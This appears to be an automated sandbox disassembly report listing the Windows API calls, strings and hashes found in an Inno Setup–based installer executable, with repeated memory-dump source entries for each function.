                                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                            • API String ID: 142928637-2676053874
                                                                                                            • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                                            • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                                                            • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                                            • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                            • API String ID: 667068680-222143506
                                                                                                            • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                                            • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                                                            • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                                            • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                                                            APIs
                                                                                                            • GetFocus.USER32 ref: 0041B755
                                                                                                            • 73A1A570.USER32(?), ref: 0041B761
                                                                                                            • 73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                                            • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                                            • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                                            • 73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A18830$A122A26310A570Focus
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906783838-0
                                                                                                            • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                                            • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                                            • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                                            • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                                            APIs
                                                                                                            • GetFocus.USER32 ref: 0041BA27
                                                                                                            • 73A1A570.USER32(?), ref: 0041BA33
                                                                                                            • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                                            • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                                            • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                                            • 73A18830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A18830$A122A26310A570Focus
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906783838-0
                                                                                                            • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                                            • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                                            • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                                            • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                                            APIs
                                                                                                            • GetFocus.USER32 ref: 0041B58E
                                                                                                            • 73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                                            • 73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                                            • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                                            • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                                            • 73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: E680$A24620A480A570Focus
                                                                                                            • String ID:
                                                                                                            • API String ID: 3709697839-0
                                                                                                            • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                                            • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                                            • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                                            • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                                            APIs
                                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                            • API String ID: 1452528299-1580325520
                                                                                                            • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                                            • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                                                            • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                                            • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                                            • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                                            • 73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                                            • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                                            • 73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A24620MetricsSystem$A480A570
                                                                                                            • String ID:
                                                                                                            • API String ID: 4042297458-0
                                                                                                            • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                            • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                                            • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                            • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                                            APIs
                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$Show
                                                                                                            • String ID:
                                                                                                            • API String ID: 3609083571-0
                                                                                                            • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                                            • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                                                            • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                                            • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3527656728-0
                                                                                                            • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                            • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                                            • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                            • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                            • String ID: $pI$.tmp$}RI
                                                                                                            • API String ID: 3498533004-1860564545
                                                                                                            • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                                            • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                                                            • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                                            • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                                                            APIs
                                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                            • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                              • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                                              • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                            • API String ID: 3312786188-1660910688
                                                                                                            • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                                            • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                                                            • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                                            • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Attributes$Move
                                                                                                            • String ID: $pI$isRS-%.3u.tmp
                                                                                                            • API String ID: 3839737484-4128586672
                                                                                                            • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                                            • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                                                            • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                                            • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                            • API String ID: 828529508-2866557904
                                                                                                            • Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                                            • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                                                            • Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                                            • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                                                            APIs
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
                                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
                                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                                            • String ID: $pI$DeleteFile$MoveFile
                                                                                                            • API String ID: 3024442154-1403374609
                                                                                                            • Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                                            • Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
                                                                                                            • Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                                            • Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                                            • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
